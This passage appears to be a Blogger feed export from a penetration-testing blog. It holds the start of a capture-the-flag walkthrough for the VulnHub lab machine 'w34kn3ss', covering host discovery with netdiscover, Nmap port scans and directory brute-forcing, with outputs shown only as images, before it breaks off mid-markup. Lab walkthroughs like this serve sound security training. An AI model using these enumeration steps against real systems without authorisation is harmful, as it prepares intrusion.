<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1947953814412763707</id><updated>2024-10-04T20:54:45.169-05:00</updated><category term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><category term="WEB PENETRATION TESTING"/><category term="METASPLOIT"/><category term="WI-FI PENETRATION TESTING"/><category term="ANDROID PENETRATION TESTING"/><category term="IoT RASPBERRY PI"/><category term="LINUX SECURITY"/><category term="IoT FIRMWARE ANALYSIS &amp; EMULATION"/><category term="BUFFER OVERFLOW"/><category term="IoT PLATFORMS"/><category term="LINUX ASSEMBLY EXPLOITATION"/><category term="IoT ARDUINO"/><category term="STACK OVERFLOW"/><category term="ANTIVIRUS EVASION"/><category term="NETCAT"/><category term="PASSWORD ATTACKS"/><category term="PORT REDIRECTION / TUNNELING   / ENCAPSULATION"/><category term="PENTEST INFO GATHERING"/><category term="FILE TRANSFER POST-EXPLOITATION"/><category term="PROGRAM ALTERATION"/><category term="FORMAT STRING ATTACK"/><category term="HEAP OVERFLOW"/><category term="INTEGER OVERFLOW"/><title type='text'>Whitelist</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='https://www.whitelist1.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default?start-index=26&amp;max-results=25'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>332</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-3571066600460127598</id><published>2022-03-01T12:30:00.000-06:00</published><updated>2022-03-01T12:40:33.034-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>w34kn3ss</title><content type='html'>&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-size: medium;&quot;&gt;W34KN3SS&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj57VYDM-VgJKJSv9JcucnarQLKRh133R4g6sm_K9t1QYLn9psi-1S23L3BB3VibGf3CQTcnaTZPoPIcF4XMVYU0lm0RDEW5TzgiINlGwzmtV9KGziqqF5S4Y0eQkz1312NFf4Ie74w5NWusXK5j1J5ILYlxP-gNgnbAt-Hk13xIJjXNVG5997USMAYwQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;244&quot; data-original-width=&quot;651&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj57VYDM-VgJKJSv9JcucnarQLKRh133R4g6sm_K9t1QYLn9psi-1S23L3BB3VibGf3CQTcnaTZPoPIcF4XMVYU0lm0RDEW5TzgiINlGwzmtV9KGziqqF5S4Y0eQkz1312NFf4Ie74w5NWusXK5j1J5ILYlxP-gNgnbAt-Hk13xIJjXNVG5997USMAYwQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;1 - INTRODUCTION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp;The goal of this exercise is to develop a hacking process for the vulnerable machine &lt;b&gt;w34kn3ss&lt;/b&gt;, from the VulnHub pentesting platform.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp; &lt;b&gt;w34kn3ss&lt;/b&gt; can be downloaded from here:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/1,270/&quot;&gt;https://www.vulnhub.com/entry/1,270/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once the virtual machine downloaded and extracted with VirtualBox:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhUiZR9jwHSzgI1IhNxt47Uqa5y9vUEsEaV0JTUEc22az-tizCsEPYBkj-duxI4Q4SNCGSau2F0esn3fLdDJ6lKIoaMRssj90B96Q0Zfug6oibAg56Eo80NNA6gq0oLTWRZJUDfWwE0iPI6jILGA17mDJjQVl8tzRb-52VPmJnvUN4kUnN9PYZpL_pJ-Q&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;149&quot; data-original-width=&quot;271&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhUiZR9jwHSzgI1IhNxt47Uqa5y9vUEsEaV0JTUEc22az-tizCsEPYBkj-duxI4Q4SNCGSau2F0esn3fLdDJ6lKIoaMRssj90B96Q0Zfug6oibAg56Eo80NNA6gq0oLTWRZJUDfWwE0iPI6jILGA17mDJjQVl8tzRb-52VPmJnvUN4kUnN9PYZpL_pJ-Q=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;2 - ENUMERATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for IP with netdiscover, it is 192.168.1.43:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh0Dj7myNsuKD1rqM_Bodcp9LVIm6eqT4Ves5QwXbGstlWptHmw4IYq27GD3dB1huzeR5TEpAT8nLJzPzbE0B9lE2cNIktjyT3204MeF5WpBJHi6Jt1uofUUf1NmlkFnhVklqWKHOOF1ZxN3irZY8eHH9SPyfvybwAoj-3PYw8iWbspbMCq9Dy8mHdFTQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;46&quot; data-original-width=&quot;387&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh0Dj7myNsuKD1rqM_Bodcp9LVIm6eqT4Ves5QwXbGstlWptHmw4IYq27GD3dB1huzeR5TEpAT8nLJzPzbE0B9lE2cNIktjyT3204MeF5WpBJHi6Jt1uofUUf1NmlkFnhVklqWKHOOF1ZxN3irZY8eHH9SPyfvybwAoj-3PYw8iWbspbMCq9Dy8mHdFTQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgxRSvC1gop25q25GD2Fw2kzn6RTmZ-nL3RlVdYxgqoGp2ngPIteKKPmiJLxu2FPOtWSa4j1P7vNXHLoZ30FxC-hPc5uMmSb0kRUIzK7P1gbPjPguQxuK3_JHQOoy3b68JqSRsWOQTm-WWNmUEXwMEGQzIaJFMfZjmnKzDC1kHeplZUjZPYQpfO6ikixw&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;355&quot; data-original-width=&quot;975&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgxRSvC1gop25q25GD2Fw2kzn6RTmZ-nL3RlVdYxgqoGp2ngPIteKKPmiJLxu2FPOtWSa4j1P7vNXHLoZ30FxC-hPc5uMmSb0kRUIzK7P1gbPjPguQxuK3_JHQOoy3b68JqSRsWOQTm-WWNmUEXwMEGQzIaJFMfZjmnKzDC1kHeplZUjZPYQpfO6ikixw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning with Nmap:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg5m7gn0YzSUjB_HU9MKHwFjLgImaXq26DY_IxREKBV6aIBtgf-7cPWSy-2FVOd55LLx1kel0pZ3AR5z4T4ygXD27ChsqZBNhlPQEF3XJTPUMvGHMBbZloGzqNRvt-hnv7vAaTGTTapzZAzh8xBAsdQnVf1oAF2Y-9RwIhdf6ZxspMHJwuhS1WCIFxPqQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;230&quot; data-original-width=&quot;435&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg5m7gn0YzSUjB_HU9MKHwFjLgImaXq26DY_IxREKBV6aIBtgf-7cPWSy-2FVOd55LLx1kel0pZ3AR5z4T4ygXD27ChsqZBNhlPQEF3XJTPUMvGHMBbZloGzqNRvt-hnv7vAaTGTTapzZAzh8xBAsdQnVf1oAF2Y-9RwIhdf6ZxspMHJwuhS1WCIFxPqQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning deeper both ports 80 and 443, we find domain &lt;b&gt;weakness.jth&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEinafT1LgMFjyNubhPw8iDpgrC_iKA1Moc1vnxIM7y_oPrSdE-ViWfIp1u8x6JV0tIG_kzD-78k4_lEDpZdR5cBfIzGZs2MZYLEgxQrCM9Pn-tF0ZCrTInNpiDAwqUTDupq8fiZGI16NGsqVWb8GmnzEhLtE_4xf9dM6-yMXt-y5HK8xKCKszi7FdUomg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;253&quot; data-original-width=&quot;590&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEinafT1LgMFjyNubhPw8iDpgrC_iKA1Moc1vnxIM7y_oPrSdE-ViWfIp1u8x6JV0tIG_kzD-78k4_lEDpZdR5cBfIzGZs2MZYLEgxQrCM9Pn-tF0ZCrTInNpiDAwqUTDupq8fiZGI16NGsqVWb8GmnzEhLtE_4xf9dM6-yMXt-y5HK8xKCKszi7FdUomg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgwbOrmrYfXIdRld0SxYDp6368Z4JAfn1P8UC1j1HtriEbnlzO5lhxInP0ldEXSuRlJ9NNzS86yeztX9cyOj63QoFITEB-ss9ygf31UUkyJDbFg_FkXaBt4Zy2HF2H2a0ANGMQohNpDHd6ZH5j4kYz1rT395gq_9XY6VDyECeQyq6UobCwCgVquMp6ojw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;368&quot; data-original-width=&quot;819&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgwbOrmrYfXIdRld0SxYDp6368Z4JAfn1P8UC1j1HtriEbnlzO5lhxInP0ldEXSuRlJ9NNzS86yeztX9cyOj63QoFITEB-ss9ygf31UUkyJDbFg_FkXaBt4Zy2HF2H2a0ANGMQohNpDHd6ZH5j4kYz1rT395gq_9XY6VDyECeQyq6UobCwCgVquMp6ojw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Dirbusting the web server at port 80:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg5mDrwaXg-lZPifFP145__trvhpfbHsMepulW_WJtdOsQ0Zz6pM4T0V1wQAGNCeNTGuIUxd7GKJSSC7zyKlvaH_jXL23Yy1Lm0Cd2A0boN-FIb9N6uWOIczAeH_siwFrD-sxzmBPJ_XU4tfSTSin7jQY1VqhKBGCpdQRaVXt6gQ09UEdK2PJxK-UmgsA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;782&quot; data-original-width=&quot;652&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg5mDrwaXg-lZPifFP145__trvhpfbHsMepulW_WJtdOsQ0Zz6pM4T0V1wQAGNCeNTGuIUxd7GKJSSC7zyKlvaH_jXL23Yy1Lm0Cd2A0boN-FIb9N6uWOIczAeH_siwFrD-sxzmBPJ_XU4tfSTSin7jQY1VqhKBGCpdQRaVXt6gQ09UEdK2PJxK-UmgsA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Nothing interesting at folders &lt;b&gt;/blog&lt;/b&gt;, &lt;b&gt;/test&lt;/b&gt; and &lt;b&gt;/uploads&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhct7bjsZE-r4BYqGygqclzbIX5w0emuYgIx6xXFj1ESBYfAPk-3TegAXIi-Bb_B2AYzvdluzuM85ajh0gVQN0Puu-UWNK-qZsg7lnTG-ZlG2rsB6AjJTNPbMCIJdZHutHzMYBUBiDltzi8lTsjVg0NPoiLKh5D6o12NbZPnZq7duyu07Th3Yvhi9Hhdg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;292&quot; data-original-width=&quot;482&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhct7bjsZE-r4BYqGygqclzbIX5w0emuYgIx6xXFj1ESBYfAPk-3TegAXIi-Bb_B2AYzvdluzuM85ajh0gVQN0Puu-UWNK-qZsg7lnTG-ZlG2rsB6AjJTNPbMCIJdZHutHzMYBUBiDltzi8lTsjVg0NPoiLKh5D6o12NbZPnZq7duyu07Th3Yvhi9Hhdg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjbuI_bu1pAmT3rE6GJcwTE2V_5J6vkvYXnxcujjB0KgT1wvsRP0uhNeznEJs44_6Rh6h2YN7Jnta5Y2eYQinVZyASvxEUTXJw8wh2lonN7L0ekAUttLhD12r0_P5deHF3n9ZduFwn8REdCV2Deb9FdheKpfxusyOVtPJ6aNXYEk3ea4OT4rIyvJmzQgw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; 